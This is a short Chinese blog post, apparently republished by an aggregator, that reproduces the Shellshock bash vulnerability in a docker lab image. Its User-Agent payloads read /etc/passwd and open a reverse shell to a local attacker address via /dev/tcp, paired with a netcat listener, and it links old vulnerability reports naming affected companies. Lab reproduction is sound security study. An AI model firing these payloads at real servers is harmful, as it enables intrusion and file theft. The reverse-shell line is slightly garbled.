docker小试牛刀之bash_shellshock漏洞复现

Posted 网络安全社区悦信安

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了docker小试牛刀之bash_shellshock漏洞复现相关的知识,希望对你有一定的参考价值。


漏洞名称 bash_shellshock

    首先,问题起因于一个命令ENV

    原型:

     env [OPTION]...[NAME=VALUE]... [COMMAND [ARGS]...]

    Man是这么说的:

    Display, set, or remove environment variables,Run a command in amodified environment.

    我的理解是使用env命令的key=value,首先会改变环境变量key,如果没有会临时创建,注意,这里是临时的改变环境变量。然后就把value后面的内容当做命令执行,类似于php中的eval

利用方法

    1pull docker镜像,搭建环境

    docker pull medicean/vulapps:b_bash_shellshock1

docker小试牛刀之bash_shellshock漏洞复现

    2、启动镜像

    docker run -d -p 1000:80 medicean/vulapps:b_bash_shellshock1

    3、使用burp抓包,更改UA

docker小试牛刀之bash_shellshock漏洞复现

docker小试牛刀之bash_shellshock漏洞复现

    () { :;};echo ; echo; echo $(/bin/cat/etc/passwd );

docker小试牛刀之bash_shellshock漏洞复现

    反弹shell

    () { :; }; /bin/bash -i >& /dev/tcp/192.168.1.12/88880>&1;

docker小试牛刀之bash_shellshock漏洞复现

    Kali运行

    nc -l -p 8888 -vvv

docker小试牛刀之bash_shellshock漏洞复现

乌云案例

    酷我音乐

    http://wy.hx99.net/bug_detail.php?wybug_id=wooyun-2016-0198299

    恒丰银行

    http://wy.hx99.net/bug_detail.php?wybug_id=wooyun-2016-0195354


以上是关于docker小试牛刀之bash_shellshock漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章

java开发之Lucene4.3开发之小试牛刀

Jenkins持续集成之小试牛刀

spring boot hello and docker

小试牛刀之python实现批量获取主机相关数据

初试Python语法小试牛刀之冒泡排序

小试牛刀之彻底删除KVM虚拟机